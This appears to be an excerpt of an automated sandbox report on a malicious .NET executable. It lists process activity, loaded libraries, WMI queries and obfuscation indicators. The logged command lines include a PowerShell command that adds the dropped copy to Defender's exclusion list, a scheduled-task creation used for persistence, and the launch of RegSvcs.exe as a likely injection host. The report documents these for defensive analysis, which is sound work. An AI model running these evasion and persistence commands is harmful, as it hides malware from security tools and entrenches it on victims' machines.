                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5220:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5396:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5464:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3552:120:WilError_03
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeFile created: C:\Users\user\AppData\Local\Temp\tmp2CA3.tmpJump to behavior
                    Source: 13P2mxLaQk.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 13P2mxLaQk.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                    Source: C:\Windows\SysWOW64\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\SysWOW64\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Windows\SysWOW64\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: tmp46C4.tmp.7.dr, tmp5C9F.tmp.7.dr, tmp5C8E.tmp.7.dr, tmp2629.tmp.7.dr, tmp46C3.tmp.7.dr, tmp263A.tmp.7.dr, tmp7F1B.tmp.7.dr, tmp80B7.tmp.13.dr, tmpDC53.tmp.13.dr, tmp5CAF.tmp.7.dr, tmpDC54.tmp.13.dr, tmpDC33.tmp.13.dr, tmp7F3C.tmp.7.dr, tmp8084.tmp.13.dr, tmp80A5.tmp.13.dr, tmp7F5C.tmp.7.dr, tmp5C8D.tmp.7.dr, tmp7F6C.tmp.7.dr, tmpDC75.tmp.13.dr, tmp8095.tmp.13.dr, tmp8073.tmp.13.dr, tmpA505.tmp.13.dr, tmpDC76.tmp.13.dr, tmp80B6.tmp.13.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: 13P2mxLaQk.exeReversingLabs: Detection: 57%
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeFile read: C:\Users\user\Desktop\13P2mxLaQk.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\13P2mxLaQk.exe "C:\Users\user\Desktop\13P2mxLaQk.exe"
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VWGccZGgix.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VWGccZGgix" /XML "C:\Users\user\AppData\Local\Temp\tmp2CA3.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\VWGccZGgix.exe C:\Users\user\AppData\Roaming\VWGccZGgix.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VWGccZGgix" /XML "C:\Users\user\AppData\Local\Temp\tmp3EC3.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VWGccZGgix.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VWGccZGgix" /XML "C:\Users\user\AppData\Local\Temp\tmp2CA3.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VWGccZGgix" /XML "C:\Users\user\AppData\Local\Temp\tmp3EC3.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeSection loaded: iconcodecservice.dllJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeSection loaded: iconcodecservice.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: 13P2mxLaQk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: 13P2mxLaQk.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: 0.2.13P2mxLaQk.exe.4199ad8.3.raw.unpack, RDYWAmJyZP6MtCkv27.cs.Net Code: FBIEZyQhi0 System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.13P2mxLaQk.exe.79a0000.6.raw.unpack, RDYWAmJyZP6MtCkv27.cs.Net Code: FBIEZyQhi0 System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeCode function: 0_2_02DFF140 push eax; iretd 0_2_02DFF141
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_071A4990 pushfd ; retf 7_2_071A4991
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeCode function: 9_2_0086F140 push eax; iretd 9_2_0086F141
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeCode function: 9_2_04BA07C2 pushad ; retf 9_2_04BA07C6
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeCode function: 9_2_04BAD358 pushad ; ret 9_2_04BAD359
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeCode function: 9_2_04BA0903 pushad ; iretd 9_2_04BA0915
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeCode function: 9_2_06F28658 push eax; ret 9_2_06F28659
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeCode function: 9_2_06F2AE30 push es; iretd 9_2_06F2AE3C
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeCode function: 9_2_06F29F36 push cs; retf 9_2_06F29F37
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeCode function: 9_2_06F29DA0 pushad ; iretd 9_2_06F29DA1
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeCode function: 9_2_06F22D70 push ecx; retf 5506h9_2_06F22DA6
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeCode function: 9_2_06F2989A push eax; retf 9_2_06F298A1
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeCode function: 9_2_06F20006 push es; retf 9_2_06F2001C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_02C21863 push cs; ret 13_2_02C21866
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_02C21867 push cs; ret 13_2_02C2186A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_06DF0E68 push es; ret 13_2_06DF0E00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_06DF0DF0 push es; ret 13_2_06DF0E00
                    Source: 13P2mxLaQk.exeStatic PE information: section name: .text entropy: 7.614575434550098
                    Source: VWGccZGgix.exe.0.drStatic PE information: section name: .text entropy: 7.614575434550098
                    Source: 0.2.13P2mxLaQk.exe.4199ad8.3.raw.unpack, RDYWAmJyZP6MtCkv27.csHigh entropy of concatenated method names: 'xlQleJbqUl', 'gUQl5exSmW', 'JyrlCNKMOj', 'cGllQH4mNQ', 'sgKl84pjLp', 'v7Xlb6huNs', 'e2NlxuxAaE', 'wq0lJxdbHl', 'VVklSvAk3R', 'cH8lsKsv1s'
                    Source: 0.2.13P2mxLaQk.exe.4199ad8.3.raw.unpack, CmxrfYvu3VwPRo8KEV.csHigh entropy of concatenated method names: 'hGBOnZY1T7', 'AfqOtHdLfp', 'HCOOfMWcJ6', 'lytORhOQyX', 'Eh9OiEcr46', 'yvsOWLGemc', 'omeOu9hc4R', 'v4sOa5FhGf', 'rYLO7MnyYN', 'YLnOBxupnc'
                    Source: 0.2.13P2mxLaQk.exe.4199ad8.3.raw.unpack, RA0wkJNMUAOO3kJeCf.csHigh entropy of concatenated method names: 'Qys4f05Ym4', 'MLt4RiNO01', 'YA846bVlxe', 'Fw14iYsUaO', 'LRC4PAiiw3', 'N2j4WSCwtv', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.13P2mxLaQk.exe.4199ad8.3.raw.unpack, Ie6tbOHlXISBMESa7Lt.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sfxLPQq38I', 'KqBLqclyuS', 'j57LYMvT3y', 'lpbLGOsQ1s', 'A9aLMlTxgB', 'maZLF6GNbF', 'PB0LjYryGF'
                    Source: 0.2.13P2mxLaQk.exe.4199ad8.3.raw.unpack, YSvyiefG2RqyJQ7gDS.csHigh entropy of concatenated method names: 'W6ebejiKoe', 'TqmbCPNxNV', 'cCnb841FVL', 'qE7bxW5SqR', 'SeLbJa6Lfl', 'WeM8M5HrOt', 'fiO8FMXvR7', 'PML8jqwMVF', 'i8W8o0p3Ht', 'CpV8NI4T4C'
                    Source: 0.2.13P2mxLaQk.exe.4199ad8.3.raw.unpack, brPLbpEGR0JAFmLvSo.csHigh entropy of concatenated method names: 'HSOHxolkxi', 'UKGHJZ2pvm', 'RxPHsQXSGf', 'xOiHdlJrEJ', 'd0IHcWxVSv', 'uieHIG2Rqy', 'XbeOH55sLXRnbRfhHQ', 'L8vnxA1msklkhsenjZ', 'LGkHHrw2AT', 'TsWHl3DBUq'
                    Source: 0.2.13P2mxLaQk.exe.4199ad8.3.raw.unpack, lxwbqfHHiZuE396D05m.csHigh entropy of concatenated method names: 'ToString', 'i9oLlmRioN', 'JtaLEBxVCv', 'aukLe1oCYs', 'OltL54cBFq', 'iocLCMqq9p', 'K0ILQfAr9j', 'zDKL8UMwTG', 'pKQ3ACH1od7heYsPNsb', 'WaxUrHHZIuVaVrMvC1S'
                    Source: 0.2.13P2mxLaQk.exe.4199ad8.3.raw.unpack, EXFsAoUrlFXQpfKFId.csHigh entropy of concatenated method names: 'DhhZ9l64B', 'X2a3BZkU8', 'sFk0UrTOi', 'w2dTYeUIt', 'DauthA8LL', 'otFX2ML86', 'hMw2wMp5Viu718rLlH', 'DcrfW4Si4UNcm3CrWO', 'lF44r7nmv', 'ly7LfAYWQ'
                    Source: 0.2.13P2mxLaQk.exe.4199ad8.3.raw.unpack, ROQeebFCJTD6D8QbK4.csHigh entropy of concatenated method names: 'E2x2oUbaje', 'RQa2VerZoy', 'ByH4AL0S7y', 'Omg4H5DYLw', 'JSw2B4ijmN', 'RT921jlAdu', 'W1b2vAkwio', 'KAr2PUiNFj', 'tGv2qG1sn5', 'a662YbcVSI'
                    Source: 0.2.13P2mxLaQk.exe.4199ad8.3.raw.unpack, zyGDIJVICS713NUbeG.csHigh entropy of concatenated method names: 'EjEpH6PWam', 'e6xplDDt9G', 'r0JpEUK4W8', 'rThp5fECtl', 'FFUpCosS4p', 'VqHp8HRlCg', 'ch7pbJjRgw', 'Na84jqeJLr', 'VLI4oG7IDf', 'ypf4NHOiLq'
